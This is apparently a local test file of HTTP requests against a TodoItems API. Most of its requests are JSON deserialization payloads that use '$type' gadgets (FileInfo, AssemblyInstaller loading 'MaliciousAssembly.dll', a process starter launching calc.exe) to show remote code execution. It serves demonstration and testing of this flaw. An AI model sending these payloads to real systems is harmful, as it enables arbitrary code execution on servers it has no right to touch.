GET https://localhost:7040/api/TodoItems HTTP/1.1

###


POST https://localhost:7040/api/TodoItems HTTP/1.1
content-type: application/json

{
  "name": "walk dog1",
  "isComplete": true,
  "metadata":
    {
        "data2": 123
    }
}

###

POST https://localhost:7040/api/TodoItems HTTP/1.1
content-type: application/json

{
  "name": "walk dog1",
  "isComplete": true,
  "metadata":
    {
        "data2": {
		"$type": "System.IO.FileInfo, System.IO.FileSystem",
		"fileName": "rce-test.txt"
	}
    }
}

###


POST https://localhost:7040/api/TodoItems HTTP/1.1
content-type: application/json

{
  "name": "load assembly",
  "isComplete": true,
  "metadata":
    {
        "data2":  {"$type":"System.Configuration.Install.AssemblyInstaller, 
            System.Configuration.Install",
            "Path":"MaliciousAssembly.dll"}
    }
}

###

POST https://localhost:7040/api/TodoItems HTTP/1.1
content-type: application/json

{
  "name": "launch calc",
  "isComplete": true,
  "metadata":
    {
        "data2":  {"$type":"MaliciousAssembly, 
            MaliciousAssembly.ProcessStarter",
            "ProcessLaunch":"calc.exe"
            }
    }
}

###
GET https://localhost:7040/api/TodoItems HTTP/1.1